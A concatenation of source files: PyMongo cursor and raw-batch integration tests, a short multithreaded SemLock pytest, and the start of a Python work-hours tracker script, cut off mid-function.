list(range(10)) random.shuffle(unsort) db.test.insert_many([{"x": i} for i in unsort]) asc = [i["x"] for i in db.test.find().sort("x", ASCENDING)] self.assertEqual(asc, list(range(10))) asc = [i["x"] for i in db.test.find().sort("x")] self.assertEqual(asc, list(range(10))) asc = [i["x"] for i in db.test.find().sort([("x", ASCENDING)])] self.assertEqual(asc, list(range(10))) expect = list(reversed(range(10))) desc = [i["x"] for i in db.test.find().sort("x", DESCENDING)] self.assertEqual(desc, expect) desc = [i["x"] for i in db.test.find().sort([("x", DESCENDING)])] self.assertEqual(desc, expect) desc = [i["x"] for i in db.test.find().sort("x", ASCENDING).sort("x", DESCENDING)] self.assertEqual(desc, expect) expected = [(1, 5), (2, 5), (0, 3), (7, 3), (9, 2), (2, 1), (3, 1)] shuffled = list(expected) random.shuffle(shuffled) db.test.drop() for (a, b) in shuffled: db.test.insert_one({"a": a, "b": b}) result = [(i["a"], i["b"]) for i in db.test.find().sort([("b", DESCENDING), ("a", ASCENDING)])] self.assertEqual(result, expected) a = db.test.find() a.sort("x", ASCENDING) for _ in a: break self.assertRaises(InvalidOperation, a.sort, "x", ASCENDING) @ignore_deprecations def test_count(self): db = self.db db.test.drop() self.assertEqual(0, db.test.find().count()) db.test.insert_many([{"x": i} for i in range(10)]) self.assertEqual(10, db.test.find().count()) self.assertTrue(isinstance(db.test.find().count(), int)) self.assertEqual(10, db.test.find().limit(5).count()) self.assertEqual(10, db.test.find().skip(5).count()) self.assertEqual(1, db.test.find({"x": 1}).count()) self.assertEqual(5, db.test.find({"x": {"$lt": 5}}).count()) a = db.test.find() b = a.count() for _ in a: break self.assertEqual(b, a.count()) self.assertEqual(0, db.test.acollectionthatdoesntexist.find().count()) @ignore_deprecations def test_count_with_hint(self): collection = self.db.test 
collection.drop() collection.insert_many([{'i': 1}, {'i': 2}]) self.assertEqual(2, collection.find().count()) collection.create_index([('i', 1)]) self.assertEqual(1, collection.find({'i': 1}).hint("_id_").count()) self.assertEqual(2, collection.find().hint("_id_").count()) self.assertRaises(OperationFailure, collection.find({'i': 1}).hint("BAD HINT").count) # Create a sparse index which should have no entries. collection.create_index([('x', 1)], sparse=True) self.assertEqual(0, collection.find({'i': 1}).hint("x_1").count()) self.assertEqual( 0, collection.find({'i': 1}).hint([("x", 1)]).count()) if client_context.version.at_least(3, 3, 2): self.assertEqual(0, collection.find().hint("x_1").count()) self.assertEqual(0, collection.find().hint([("x", 1)]).count()) else: self.assertEqual(2, collection.find().hint("x_1").count()) self.assertEqual(2, collection.find().hint([("x", 1)]).count()) @ignore_deprecations def test_where(self): db = self.db db.test.drop() a = db.test.find() self.assertRaises(TypeError, a.where, 5) self.assertRaises(TypeError, a.where, None) self.assertRaises(TypeError, a.where, {}) db.test.insert_many([{"x": i} for i in range(10)]) self.assertEqual(3, len(list(db.test.find().where('this.x < 3')))) self.assertEqual(3, len(list(db.test.find().where(Code('this.x < 3'))))) code_with_scope = Code('this.x < i', {"i": 3}) if client_context.version.at_least(4, 3, 3): # MongoDB 4.4 removed support for Code with scope. with self.assertRaises(OperationFailure): list(db.test.find().where(code_with_scope)) code_with_empty_scope = Code('this.x < 3', {}) with self.assertRaises(OperationFailure): list(db.test.find().where(code_with_empty_scope)) else: self.assertEqual( 3, len(list(db.test.find().where(code_with_scope)))) self.assertEqual(10, len(list(db.test.find()))) self.assertEqual(3, db.test.find().where('this.x < 3').count()) self.assertEqual(10, db.test.find().count()) self.assertEqual([0, 1, 2], [a["x"] for a in db.test.find().where('this.x < 3')]) self.assertEqual([], [a["x"] for a in db.test.find({"x": 5}).where('this.x < 3')]) self.assertEqual([5], [a["x"] for a in db.test.find({"x": 5}).where('this.x > 3')]) cursor = db.test.find().where('this.x < 3').where('this.x > 7') self.assertEqual([8, 9], [a["x"] for a in cursor]) a = db.test.find() b = a.where('this.x > 3') for _ in a: break self.assertRaises(InvalidOperation, a.where, 'this.x < 3') def test_rewind(self): self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find().limit(2) count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) count = 0 for _ in cursor: count += 1 self.assertEqual(0, count) cursor.rewind() count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) cursor.rewind() count = 0 for _ in cursor: break cursor.rewind() for _ in cursor: count += 1 self.assertEqual(2, count) self.assertEqual(cursor, cursor.rewind()) # oplog_reply, and snapshot are all deprecated. 
@ignore_deprecations def test_clone(self): self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find().limit(2) count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) count = 0 for _ in cursor: count += 1 self.assertEqual(0, count) cursor = cursor.clone() cursor2 = cursor.clone() count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) for _ in cursor2: count += 1 self.assertEqual(4, count) cursor.rewind() count = 0 for _ in cursor: break cursor = cursor.clone() for _ in cursor: count += 1 self.assertEqual(2, count) self.assertNotEqual(cursor, cursor.clone()) # Just test attributes cursor = self.db.test.find({"x": re.compile("^hello.*")}, projection={'_id': False}, skip=1, no_cursor_timeout=True, cursor_type=CursorType.TAILABLE_AWAIT, sort=[("x", 1)], allow_partial_results=True, oplog_replay=True, batch_size=123, collation={'locale': 'en_US'}, hint=[("_id", 1)], max_scan=100, max_time_ms=1000, return_key=True, show_record_id=True, snapshot=True, allow_disk_use=True).limit(2) cursor.min([('a', 1)]).max([('b', 3)]) cursor.add_option(128) cursor.comment('hi!') # Every attribute should be the same. cursor2 = cursor.clone() self.assertEqual(cursor.__dict__, cursor2.__dict__) # Shallow copies can so can mutate cursor2 = copy.copy(cursor) cursor2._Cursor__projection['cursor2'] = False self.assertTrue('cursor2' in cursor._Cursor__projection) # Deepcopies and shouldn't mutate cursor3 = copy.deepcopy(cursor) cursor3._Cursor__projection['cursor3'] = False self.assertFalse('cursor3' in cursor._Cursor__projection) cursor4 = cursor.clone() cursor4._Cursor__projection['cursor4'] = False self.assertFalse('cursor4' in cursor._Cursor__projection) # Test memo when deepcopying queries query = {"hello": "world"} query["reflexive"] = query cursor = self.db.test.find(query) cursor2 = copy.deepcopy(cursor) self.assertNotEqual(id(cursor._Cursor__spec), id(cursor2._Cursor__spec)) self.assertEqual(id(cursor2._Cursor__spec['reflexive']), id(cursor2._Cursor__spec)) self.assertEqual(len(cursor2._Cursor__spec), 2) # Ensure hints are cloned as the correct type cursor = self.db.test.find().hint([('z', 1), ("a", 1)]) cursor2 = copy.deepcopy(cursor) self.assertTrue(isinstance(cursor2._Cursor__hint, SON)) self.assertEqual(cursor._Cursor__hint, cursor2._Cursor__hint) def test_clone_empty(self): self.db.test.delete_many({}) self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find()[2:2] cursor2 = cursor.clone() self.assertRaises(StopIteration, cursor.next) self.assertRaises(StopIteration, cursor2.next) @ignore_deprecations def test_count_with_fields(self): self.db.test.drop() self.db.test.insert_one({"x": 1}) self.assertEqual(1, self.db.test.find({}, ["a"]).count()) def test_bad_getitem(self): self.assertRaises(TypeError, lambda x: self.db.test.find()[x], "hello") self.assertRaises(TypeError, lambda x: self.db.test.find()[x], 5.5) self.assertRaises(TypeError, lambda x: self.db.test.find()[x], None) def test_getitem_slice_index(self): self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) count = itertools.count self.assertRaises(IndexError, lambda: self.db.test.find()[-1:]) self.assertRaises(IndexError, lambda: self.db.test.find()[1:2:2]) for a, b in zip(count(0), self.db.test.find()): self.assertEqual(a, b['i']) self.assertEqual(100, len(list(self.db.test.find()[0:]))) for a, b in zip(count(0), self.db.test.find()[0:]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[20:]))) for a, b in 
zip(count(20), self.db.test.find()[20:]): self.assertEqual(a, b['i']) for a, b in zip(count(99), self.db.test.find()[99:]): self.assertEqual(a, b['i']) for i in self.db.test.find()[1000:]: self.fail() self.assertEqual(5, len(list(self.db.test.find()[20:25]))) self.assertEqual(5, len(list( self.db.test.find()[20:25]))) for a, b in zip(count(20), self.db.test.find()[20:25]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[40:45][20:]))) for a, b in zip(count(20), self.db.test.find()[40:45][20:]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[40:45].limit(0).skip(20)) ) ) for a, b in zip(count(20), self.db.test.find()[40:45].limit(0).skip(20)): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find().limit(10).skip(40)[20:])) ) for a, b in zip(count(20), self.db.test.find().limit(10).skip(40)[20:]): self.assertEqual(a, b['i']) self.assertEqual(1, len(list(self.db.test.find()[:1]))) self.assertEqual(5, len(list(self.db.test.find()[:5]))) self.assertEqual(1, len(list(self.db.test.find()[99:100]))) self.assertEqual(1, len(list(self.db.test.find()[99:1000]))) self.assertEqual(0, len(list(self.db.test.find()[10:10]))) self.assertEqual(0, len(list(self.db.test.find()[:0]))) self.assertEqual(80, len(list(self.db.test.find()[10:10].limit(0).skip(20)) ) ) self.assertRaises(IndexError, lambda: self.db.test.find()[10:8]) def test_getitem_numeric_index(self): self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) self.assertEqual(0, self.db.test.find()[0]['i']) self.assertEqual(50, self.db.test.find()[50]['i']) self.assertEqual(50, self.db.test.find().skip(50)[0]['i']) self.assertEqual(50, self.db.test.find().skip(49)[1]['i']) self.assertEqual(50, self.db.test.find()[50]['i']) self.assertEqual(99, self.db.test.find()[99]['i']) self.assertRaises(IndexError, lambda x: self.db.test.find()[x], -1) self.assertRaises(IndexError, lambda x: self.db.test.find()[x], 100) self.assertRaises(IndexError, lambda x: self.db.test.find().skip(50)[x], 50) @ignore_deprecations def test_count_with_limit_and_skip(self): self.assertRaises(TypeError, self.db.test.find().count, "foo") def check_len(cursor, length): self.assertEqual(len(list(cursor)), cursor.count(True)) self.assertEqual(length, cursor.count(True)) self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) check_len(self.db.test.find(), 100) check_len(self.db.test.find().limit(10), 10) check_len(self.db.test.find().limit(110), 100) check_len(self.db.test.find().skip(10), 90) check_len(self.db.test.find().skip(110), 0) check_len(self.db.test.find().limit(10).skip(10), 10) check_len(self.db.test.find()[10:20], 10) check_len(self.db.test.find().limit(10).skip(95), 5) check_len(self.db.test.find()[95:105], 5) def test_len(self): self.assertRaises(TypeError, len, self.db.test.find()) def test_properties(self): self.assertEqual(self.db.test, self.db.test.find().collection) def set_coll(): self.db.test.find().collection = "hello" self.assertRaises(AttributeError, set_coll) def test_get_more(self): db = self.db db.drop_collection("test") db.test.insert_many([{'i': i} for i in range(10)]) self.assertEqual(10, len(list(db.test.find().batch_size(5)))) def test_tailable(self): db = self.db db.drop_collection("test") db.create_collection("test", capped=True, size=1000, max=3) self.addCleanup(db.drop_collection, "test") cursor = db.test.find(cursor_type=CursorType.TAILABLE) db.test.insert_one({"x": 1}) count = 0 for doc in cursor: 
count += 1 self.assertEqual(1, doc["x"]) self.assertEqual(1, count) db.test.insert_one({"x": 2}) count = 0 for doc in cursor: count += 1 self.assertEqual(2, doc["x"]) self.assertEqual(1, count) db.test.insert_one({"x": 3}) count = 0 for doc in cursor: count += 1 self.assertEqual(3, doc["x"]) self.assertEqual(1, count) # Capped rollover - the collection can never # have more than 3 documents. Just make sure # this doesn't raise... db.test.insert_many([{"x": i} for i in range(4, 7)]) self.assertEqual(0, len(list(cursor))) # and that the cursor doesn't think it's still alive. self.assertFalse(cursor.alive) self.assertEqual(3, db.test.count_documents({})) # __getitem__(index) for cursor in (db.test.find(cursor_type=CursorType.TAILABLE), db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)): self.assertEqual(4, cursor[0]["x"]) self.assertEqual(5, cursor[1]["x"]) self.assertEqual(6, cursor[2]["x"]) cursor.rewind() self.assertEqual([4], [doc["x"] for doc in cursor[0:1]]) cursor.rewind() self.assertEqual([5], [doc["x"] for doc in cursor[1:2]]) cursor.rewind() self.assertEqual([6], [doc["x"] for doc in cursor[2:3]]) cursor.rewind() self.assertEqual([4, 5], [doc["x"] for doc in cursor[0:2]]) cursor.rewind() self.assertEqual([5, 6], [doc["x"] for doc in cursor[1:3]]) cursor.rewind() self.assertEqual([4, 5, 6], [doc["x"] for doc in cursor[0:3]]) def test_concurrent_close(self): """Ensure a tailable can be closed from another thread.""" db = self.db db.drop_collection("test") db.create_collection("test", capped=True, size=1000, max=3) self.addCleanup(db.drop_collection, "test") cursor = db.test.find(cursor_type=CursorType.TAILABLE) def iterate_cursor(): while cursor.alive: for doc in cursor: pass t = threading.Thread(target=iterate_cursor) t.start() time.sleep(1) cursor.close() self.assertFalse(cursor.alive) t.join(3) self.assertFalse(t.is_alive()) def test_distinct(self): self.db.drop_collection("test") self.db.test.insert_many( [{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}]) distinct = self.db.test.find({"a": {"$lt": 3}}).distinct("a") distinct.sort() self.assertEqual([1, 2], distinct) self.db.drop_collection("test") self.db.test.insert_one({"a": {"b": "a"}, "c": 12}) self.db.test.insert_one({"a": {"b": "b"}, "c": 8}) self.db.test.insert_one({"a": {"b": "c"}, "c": 12}) self.db.test.insert_one({"a": {"b": "c"}, "c": 8}) distinct = self.db.test.find({"c": 8}).distinct("a.b") distinct.sort() self.assertEqual(["b", "c"], distinct) @client_context.require_version_max(4, 1, 0, -1) def test_max_scan(self): self.db.drop_collection("test") self.db.test.insert_many([{} for _ in range(100)]) self.assertEqual(100, len(list(self.db.test.find()))) self.assertEqual(50, len(list(self.db.test.find().max_scan(50)))) self.assertEqual(50, len(list(self.db.test.find() .max_scan(90).max_scan(50)))) def test_with_statement(self): self.db.drop_collection("test") self.db.test.insert_many([{} for _ in range(100)]) c1 = self.db.test.find() with self.db.test.find() as c2: self.assertTrue(c2.alive) self.assertFalse(c2.alive) with self.db.test.find() as c2: self.assertEqual(100, len(list(c2))) self.assertFalse(c2.alive) self.assertTrue(c1.alive) @client_context.require_no_mongos @ignore_deprecations def test_comment(self): # MongoDB 3.1.5 changed the ns for commands. 
regex = {'$regex': r'pymongo_test.(\$cmd|test)'} if client_context.version.at_least(3, 5, 8, -1): query_key = "command.comment" elif client_context.version.at_least(3, 1, 8, -1): query_key = "query.comment" else: query_key = "query.$comment" self.client.drop_database(self.db) self.db.set_profiling_level(ALL) try: list(self.db.test.find().comment('foo')) op = self.db.system.profile.find({'ns': 'pymongo_test.test', 'op': 'query', query_key: 'foo'}) self.assertEqual(op.count(), 1) self.db.test.find().comment('foo').count() op = self.db.system.profile.find({'ns': regex, 'op': 'command', 'command.count': 'test', 'command.comment': 'foo'}) self.assertEqual(op.count(), 1) self.db.test.find().comment('foo').distinct('type') op = self.db.system.profile.find({'ns': regex, 'op': 'command', 'command.distinct': 'test', 'command.comment': 'foo'}) self.assertEqual(op.count(), 1) finally: self.db.set_profiling_level(OFF) self.db.system.profile.drop() self.db.test.insert_many([{}, {}]) cursor = self.db.test.find() next(cursor) self.assertRaises(InvalidOperation, cursor.comment, 'hello') def test_modifiers(self): c = self.db.test # "modifiers" is deprecated. with ignore_deprecations(): cur = c.find() self.assertTrue('$query' not in cur._Cursor__query_spec()) cur = c.find().comment("testing").max_time_ms(500) self.assertTrue('$query' in cur._Cursor__query_spec()) self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing") self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500) cur = c.find( modifiers={"$maxTimeMS": 500, "$comment": "testing"}) self.assertTrue('$query' in cur._Cursor__query_spec()) self.assertEqual(cur._Cursor__query_spec()["$comment"], "testing") self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 500) # Keyword arg overwrites modifier. # If we remove the "modifiers" arg, delete this test after checking # that TestCommandMonitoring.test_find_options covers all cases. cur = c.find(comment="hi", modifiers={"$comment": "bye"}) self.assertEqual(cur._Cursor__query_spec()["$comment"], "hi") cur = c.find(max_scan=1, modifiers={"$maxScan": 2}) self.assertEqual(cur._Cursor__query_spec()["$maxScan"], 1) cur = c.find(max_time_ms=1, modifiers={"$maxTimeMS": 2}) self.assertEqual(cur._Cursor__query_spec()["$maxTimeMS"], 1) cur = c.find(min=1, modifiers={"$min": 2}) self.assertEqual(cur._Cursor__query_spec()["$min"], 1) cur = c.find(max=1, modifiers={"$max": 2}) self.assertEqual(cur._Cursor__query_spec()["$max"], 1) cur = c.find(return_key=True, modifiers={"$returnKey": False}) self.assertEqual(cur._Cursor__query_spec()["$returnKey"], True) cur = c.find(hint=[("a", 1)], modifiers={"$hint": {"b": "1"}}) self.assertEqual(cur._Cursor__query_spec()["$hint"], {"a": 1}) # The arg is named show_record_id after the "find" command arg, the # modifier is named $showDiskLoc for the OP_QUERY modifier. It's # stored as $showDiskLoc then upgraded to showRecordId if we send a # "find" command. 
cur = c.find(show_record_id=True, modifiers={"$showDiskLoc": False}) self.assertEqual(cur._Cursor__query_spec()["$showDiskLoc"], True) if not client_context.version.at_least(3, 7, 3): cur = c.find(snapshot=True, modifiers={"$snapshot": False}) self.assertEqual(cur._Cursor__query_spec()["$snapshot"], True) def test_alive(self): self.db.test.delete_many({}) self.db.test.insert_many([{} for _ in range(3)]) self.addCleanup(self.db.test.delete_many, {}) cursor = self.db.test.find().batch_size(2) n = 0 while True: cursor.next() n += 1 if 3 == n: self.assertFalse(cursor.alive) break self.assertTrue(cursor.alive) def test_close_kills_cursor_synchronously(self): # Kill any cursors possibly queued up by previous tests. gc.collect() self.client._process_periodic_tasks() listener = WhiteListEventListener("killCursors") results = listener.results client = rs_or_single_client(event_listeners=[listener]) self.addCleanup(client.close) coll = client[self.db.name].test_close_kills_cursors # Add some test data. docs_inserted = 1000 coll.insert_many([{"i": i} for i in range(docs_inserted)]) results.clear() # Close a cursor while it's still open on the server. cursor = coll.find().batch_size(10) self.assertTrue(bool(next(cursor))) self.assertLess(cursor.retrieved, docs_inserted) cursor.close() def assertCursorKilled(): self.assertEqual(1, len(results["started"])) self.assertEqual("killCursors", results["started"][0].command_name) self.assertEqual(1, len(results["succeeded"])) self.assertEqual("killCursors", results["succeeded"][0].command_name) assertCursorKilled() results.clear() # Close a command cursor while it's still open on the server. cursor = coll.aggregate([], batchSize=10) self.assertTrue(bool(next(cursor))) cursor.close() # The cursor should be killed if it had a non-zero id. if cursor.cursor_id: assertCursorKilled() else: self.assertEqual(0, len(results["started"])) def test_delete_not_initialized(self): # Creating a cursor with invalid arguments will not run __init__ # but will still call __del__, eg test.find(invalidKwarg=1). cursor = Cursor.__new__(Cursor) # Skip calling __init__ cursor.__del__() # no error @client_context.require_version_min(3, 6) def test_getMore_does_not_send_readPreference(self): listener = WhiteListEventListener('find', 'getMore') client = rs_or_single_client( event_listeners=[listener]) self.addCleanup(client.close) coll = client[self.db.name].test coll.delete_many({}) coll.insert_many([{} for _ in range(5)]) self.addCleanup(coll.drop) list(coll.find(batch_size=3)) started = listener.results['started'] self.assertEqual(2, len(started)) self.assertEqual('find', started[0].command_name) self.assertIn('$readPreference', started[0].command) self.assertEqual('getMore', started[1].command_name) self.assertNotIn('$readPreference', started[1].command) class TestRawBatchCursor(IntegrationTest): def test_find_raw(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) batches = list(c.find_raw_batches().sort('_id')) self.assertEqual(1, len(batches)) self.assertEqual(docs, decode_all(batches[0])) def test_explain(self): c = self.db.test c.insert_one({}) explanation = c.find_raw_batches().explain() self.assertIsInstance(explanation, dict) def test_clone(self): cursor = self.db.test.find_raw_batches() # Copy of a RawBatchCursor is also a RawBatchCursor, not a Cursor. 
self.assertIsInstance(next(cursor.clone()), bytes) self.assertIsInstance(next(copy.copy(cursor)), bytes) @client_context.require_no_mongos def test_exhaust(self): c = self.db.test c.drop() c.insert_many({'_id': i} for i in range(200)) result = b''.join(c.find_raw_batches(cursor_type=CursorType.EXHAUST)) self.assertEqual([{'_id': i} for i in range(200)], decode_all(result)) def test_server_error(self): with self.assertRaises(OperationFailure) as exc: next(self.db.test.find_raw_batches({'x': {'$bad': 1}})) # The server response was decoded, not left raw. self.assertIsInstance(exc.exception.details, dict) def test_get_item(self): with self.assertRaises(InvalidOperation): self.db.test.find_raw_batches()[0] @client_context.require_version_min(3, 4) def test_collation(self): next(self.db.test.find_raw_batches(collation=Collation('en_US'))) @client_context.require_version_max(3, 2) def test_collation_error(self): with self.assertRaises(ConfigurationError): next(self.db.test.find_raw_batches(collation=Collation('en_US'))) @client_context.require_version_min(3, 2) def test_read_concern(self): c = self.db.get_collection("test", read_concern=ReadConcern("majority")) next(c.find_raw_batches()) @client_context.require_version_max(3, 1) def test_read_concern_error(self): c = self.db.get_collection("test", read_concern=ReadConcern("majority")) with self.assertRaises(ConfigurationError): next(c.find_raw_batches()) def test_monitoring(self): listener = EventListener() client = rs_or_single_client(event_listeners=[listener]) c = client.pymongo_test.test c.drop() c.insert_many([{'_id': i} for i in range(10)]) listener.results.clear() cursor = c.find_raw_batches(batch_size=4) # First raw batch of 4 documents. next(cursor) started = listener.results['started'][0] succeeded = listener.results['succeeded'][0] self.assertEqual(0, len(listener.results['failed'])) self.assertEqual('find', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('find', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") # The batch is a list of one raw bytes object. self.assertEqual(len(csr["firstBatch"]), 1) self.assertEqual(decode_all(csr["firstBatch"][0]), [{'_id': i} for i in range(0, 4)]) listener.results.clear() # Next raw batch of 4 documents. next(cursor) try: results = listener.results started = results['started'][0] succeeded = results['succeeded'][0] self.assertEqual(0, len(results['failed'])) self.assertEqual('getMore', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('getMore', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") self.assertEqual(len(csr["nextBatch"]), 1) self.assertEqual(decode_all(csr["nextBatch"][0]), [{'_id': i} for i in range(4, 8)]) finally: # Finish the cursor. 
tuple(cursor) class TestRawBatchCommandCursor(IntegrationTest): @classmethod def setUpClass(cls): super(TestRawBatchCommandCursor, cls).setUpClass() def test_aggregate_raw(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) batches = list(c.aggregate_raw_batches([{'$sort': {'_id': 1}}])) self.assertEqual(1, len(batches)) self.assertEqual(docs, decode_all(batches[0])) def test_server_error(self): c = self.db.test c.drop() docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)] c.insert_many(docs) c.insert_one({'_id': 10, 'x': 'not a number'}) with self.assertRaises(OperationFailure) as exc: list(self.db.test.aggregate_raw_batches([{ '$sort': {'_id': 1}, }, { '$project': {'x': {'$multiply': [2, '$x']}} }], batchSize=4)) # The server response was decoded, not left raw. self.assertIsInstance(exc.exception.details, dict) def test_get_item(self): with self.assertRaises(InvalidOperation): self.db.test.aggregate_raw_batches([])[0] @client_context.require_version_min(3, 4) def test_collation(self): next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US'))) @client_context.require_version_max(3, 2) def test_collation_error(self): with self.assertRaises(ConfigurationError): next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US'))) def test_monitoring(self): listener = EventListener() client = rs_or_single_client(event_listeners=[listener]) c = client.pymongo_test.test c.drop() c.insert_many([{'_id': i} for i in range(10)]) listener.results.clear() cursor = c.aggregate_raw_batches([{'$sort': {'_id': 1}}], batchSize=4) # Start cursor, no initial batch. started = listener.results['started'][0] succeeded = listener.results['succeeded'][0] self.assertEqual(0, len(listener.results['failed'])) self.assertEqual('aggregate', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('aggregate', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") # First batch is empty. self.assertEqual(len(csr["firstBatch"]), 0) listener.results.clear() # Batches of 4 documents. n = 0 for batch in cursor: results = listener.results started = results['started'][0] succeeded = results['succeeded'][0] self.assertEqual(0, len(results['failed'])) self.assertEqual('getMore', started.command_name) self.assertEqual('pymongo_test', started.database_name) self.assertEqual('getMore', succeeded.command_name) csr = succeeded.reply["cursor"] self.assertEqual(csr["ns"], "pymongo_test.test") self.assertEqual(len(csr["nextBatch"]), 1) self.assertEqual(csr["nextBatch"][0], batch) self.assertEqual(decode_all(batch), [{'_id': i} for i in range(n, min(n + 4, 10))]) n += 4 listener.results.clear() if __name__ == "__main__": unittest.main()
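A minimal standalone sketch of the raw-batch pattern exercised by TestRawBatchCursor above, assuming a reachable mongod on localhost:27017 and the public pymongo/bson API; the database and collection names are illustrative only, not taken from the tests.

from bson import decode_all
from pymongo import MongoClient

client = MongoClient("localhost", 27017)
coll = client.pymongo_test.raw_batch_demo
coll.drop()
coll.insert_many([{"_id": i, "x": 3.0 * i} for i in range(10)])

# find_raw_batches() yields one bytes object per server batch instead of
# decoded documents; decode_all() turns a raw batch back into a list of dicts.
for raw_batch in coll.find_raw_batches(batch_size=4).sort("_id"):
    docs = decode_all(raw_batch)
    print(len(docs), docs[0])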
test_semlock.py
from _multiprocessing import SemLock
from threading import Thread
import thread
import time
import sys

import pytest


@pytest.mark.skipif(sys.platform=='win32', reason='segfaults on win32')
def test_notify_all():
    """A low-level variation on test_notify_all() in lib-python's
    test_multiprocessing.py
    """
    N_THREADS = 1000
    lock = SemLock(0, 1, 1)
    results = []

    def f(n):
        if lock.acquire(timeout=5.):
            results.append(n)
            lock.release()
        else:
            print("lock acquire timed out!")

    threads = [Thread(target=f, args=(i,)) for i in range(N_THREADS)]
    n_started = N_THREADS
    with lock:
        for t in threads:
            try:
                t.start()
            except thread.error:
                # too many threads for this system
                t.started = False
                n_started -= 1
            else:
                t.started = True
        time.sleep(0.1)
    print("started %d threads" % n_started)
    for t in threads:
        if t.started:
            t.join()
    assert len(results) == n_started
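For comparison, a sketch of the same acquire-with-timeout pattern using the public threading API rather than the low-level _multiprocessing.SemLock; the thread count and timeout here are arbitrary choices, not values from the test.

import threading

sem = threading.Semaphore(1)
results = []

def worker(n):
    # Semaphore.acquire() takes a timeout, like SemLock.acquire() above.
    if sem.acquire(timeout=5.0):
        results.append(n)
        sem.release()

threads = [threading.Thread(target=worker, args=(i,)) for i in range(100)]
with sem:                      # hold the semaphore so every worker blocks first
    for t in threads:
        t.start()
for t in threads:              # once released, each worker gets its turn
    t.join()
assert len(results) == len(threads)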
main.py
# import modules try : import os import configparser import time as tm from datetime import * import json import prettytable import easygui import threading except : myassert( False, "Could not import some modules. Use \'pip install <module>\' to install them", True ) # import internal modules from Menu import * from Utils import * # reading config and database files globally, as its required for all functions config = configparser.ConfigParser() config.read('config.ini') dbfile = open( config['DEFAULT']['TIMEDB'], 'r' ) timedb = json.loads( dbfile.read() ) dbfile.close() # Global variables th_sed = None stop_sed = False # write to database file def savedb() : file = open( config['DEFAULT']['TIMEDB'], 'w' ) file.write( json.dumps(timedb, indent=4) ) file.close() # display the current statistics def show_stats(wk=None) : global config global timedb # prepare table for current week data table = prettytable.PrettyTable(["Date", "Day", "Work Day", "Duration"]) if wk is None : ( _, curweek, _) = datetime.today().isocalendar() else : curweek = wk # calculate deficit hours ndays = 0 acttd = timedelta(0) flgTimerStarted = False for entry in timedb : # calculate number of working days ndays += entry['workday'] # calculate total td = timedelta(0) for tim in entry['timestamps'] : (h, m, s) = tim['start'].split(":") start = datetime.combine(date.today(), time(int(h),int(m),int(s))) if tim['end'] is not None : (h, m, s) = tim['end'].split(":") end = datetime.combine(date.today(), time(int(h),int(m),int(s))) td += (end - start) else : flgTimerStarted = True end = datetime.today() td += (end - start) acttd = acttd + td + timedelta( minutes = entry['correction'] ) # collect data for current week (y, mm, s) = entry['date'].split("-") dat = datetime( int(y), int(mm), int(s) ) ( _, week, _) = dat.isocalendar() if week == curweek : hrs = td.seconds/3600 hrs += ( int(entry['correction']) / 60 ) table.add_row( [ entry['date'], dat.strftime("%a"), entry['workday'], f"{hrs:.2f}" ] ) exphrs = ( ndays * float( config['DEFAULT']['DAILYEFFORT'] ) ) + float( config['DEFAULT']['CARRYDEFICIT'] ) acthrs = acttd.total_seconds()/3600 defhrs = exphrs - acthrs clearscr() print(table) print(f"Deficit hours: {defhrs:.2f}") print(f"Timer running: {flgTimerStarted}") def start_timer() : global config global timedb # modify contents tod = datetime.today().strftime("%Y-%m-%d") idx = None flgTimerStarted = False for i in range( len(timedb) ) : if tod == timedb[i]['date'] : idx = i # Check if timer is already started for timestamp in timedb[i]['timestamps'] : if timestamp['start'] is not None and timestamp['end'] is None : flgTimerStarted = True break break if idx is None : datentry = { "date": tod, "workday": 1, "timestamps": [], "correction" : 0 } idx = len(timedb) timedb.append(datentry) if not flgTimerStarted : timentry = { "start": datetime.now().strftime("%H:%M:%S"), "end": None } timedb[idx]['timestamps'].append(timentry) # start sedentary timer if not started global th_sed if not th_sed.is_alive() : print( "Timer is not running" ) th_sed = threading.Thread( target=sed_timer, daemon=True ) global stop_sed stop_sed = False th_sed.start() # write back savedb() show_menu() def stop_timer() : global config global timedb # modify contents tod = datetime.today().strftime("%Y-%m-%d") for i in range( len(timedb) ) : if tod == timedb[i]['date'] : for j in range( len(timedb[i]['timestamps']) ) : if timedb[i]['timestamps'][j]['end'] is None : timedb[i]['timestamps'][j]['end'] = datetime.now().strftime("%H:%M:%S") break break # stop 
